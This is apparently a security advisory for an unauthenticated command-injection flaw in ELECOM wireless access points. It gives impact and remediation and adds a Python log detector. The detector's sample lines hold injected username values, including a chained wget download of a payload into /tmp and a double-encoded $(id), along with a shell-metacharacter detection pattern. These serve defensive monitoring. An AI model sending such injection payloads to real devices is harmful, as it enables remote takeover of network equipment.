CVE-2026-42062
ELECOM · Wireless LAN Access Point
ELECOM wireless LAN access points are vulnerable to OS command injection via the username parameter, allowing unauthenticated remote code execution.
Executive summary
An unauthenticated OS command injection vulnerability in ELECOM wireless LAN access points allows attackers to execute arbitrary code on the device.
Vulnerability
The device does not sanitize the username parameter before it is incorporated into an OS command, so shell metacharacters in that parameter terminate the intended command and run attacker-supplied ones. Because the affected request is reachable without authentication, any client that can reach the management interface can execute arbitrary commands with the privileges of the device's web service, which on embedded devices of this class is typically root.
Business impact
The CVSS base score of 9.8 (Critical) reflects an unauthenticated, network-reachable path to full device compromise. An attacker who controls the access point can intercept or redirect wireless client traffic, alter DNS and routing settings, install persistent implants in firmware, and use the device as a pivot into the wired network behind it.
Remediation
Immediate Action: Update all ELECOM access points to the fixed firmware version published by the vendor, and verify the running version on each device after the update.
Proactive Monitoring: Consumer access points rarely log request parameters, so capture management-interface traffic at an upstream proxy, IDS or span port and inspect the username parameter (after URL decoding) for shell metacharacters such as `;`, `|`, `&`, backticks and `$(`, as well as double-encoded variants.
Compensating Controls: Until patched, do not expose the management interface to the WAN, guest or client wireless networks; place it on a dedicated management VLAN reachable only from authorized administrator addresses.
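The monitoring step above calls for inspecting the username parameter for command-injection payloads. The following detector is an added example written for this page; it is not code from the advisory, the vendor or any ELECOM product. It assumes web-server-style combined log lines (or a query string or form body captured by a proxy), and the endpoint path /login.cgi in the constructed sample lines is a placeholder, not the device's actual endpoint.

```python
"""Flag HTTP requests whose `username` parameter carries shell metacharacters.

Hypothetical detector for command-injection attempts against a web login
parameter. Works on combined-format access log lines (query string only) or
on a raw form body supplied by a proxy/IDS capture.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

PARAM = "username"

# Characters/sequences that end or chain a shell command: ; | & ` $ < > newline NUL.
# Parameter separators are split off by parse_qs first, so a decoded '&' or ';'
# *inside* a value is itself suspicious.
_METACHAR_RE = re.compile(r"[;&|`$<>\n\r\x00]")

# Combined log format: source, ident, user, [time] "METHOD target proto" status ...
_LOG_LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def username_candidates(request_target: str, body: str = "") -> list[str]:
    """Return every `username` value found in the URL query and an optional form body."""
    values: list[str] = []
    query = urlsplit(request_target).query
    for source in (query, body):
        values.extend(parse_qs(source, keep_blank_values=True).get(PARAM, []))
    return values


def is_suspicious(value: str) -> bool:
    """True if the decoded value, or a second decode pass, contains shell metacharacters.

    parse_qs already decoded one layer; the extra unquote_plus catches payloads
    that were double-encoded to slip past naive filters (%2524 -> %24 -> $).
    """
    for candidate in (value, unquote_plus(value)):
        if _METACHAR_RE.search(candidate):
            return True
    return False


def scan_log(lines) -> list[tuple[str, str, str]]:
    """Return (source_ip, request_target, decoded_username) for each suspicious request."""
    hits = []
    for line in lines:
        m = _LOG_LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for value in username_candidates(m.group("target")):
            if is_suspicious(value):
                hits.append((m.group("src"), m.group("target"), value))
    return hits


# Constructed sample log lines (not real traffic). /login.cgi is a placeholder path.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2026:12:00:00 +0000] "GET /login.cgi?username=admin&password=x HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2026:12:00:00 +0000] "GET /login.cgi?username=o%27brien&password=x HTTP/1.1" 200 512',
    # ';' terminates the intended command and chains a download of a second-stage payload.
    '203.0.113.7 - - [01/Jan/2026:12:00:01 +0000] "GET /login.cgi?username=admin%3Bwget+http%3A%2F%2F203.0.113.7%2Fx+-O+%2Ftmp%2Fx HTTP/1.1" 200 512',
    # Double-encoded $(id): one decode yields %24%28id%29, a second yields $(id).
    '203.0.113.7 - - [01/Jan/2026:12:00:02 +0000] "GET /login.cgi?username=admin%2524%2528id%2529 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for src, target, value in scan_log(SAMPLE_LOG):
        print(f"ALERT src={src} username={value!r} target={target}")
```

For POST logins the parameter travels in the body, which access logs do not record; feed the captured body through `username_candidates("", body)` from a proxy or IDS hook instead. The check is deliberately narrow (metacharacters only) to keep false positives low on ordinary usernames such as `o'brien`; extend the character class if the deployment's own username policy is stricter.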
Exploitation status
Public Exploit Available: Unknown
Analyst recommendation
This is a critical vulnerability that allows full device compromise. Immediate firmware updates are required to mitigate the risk of remote code execution.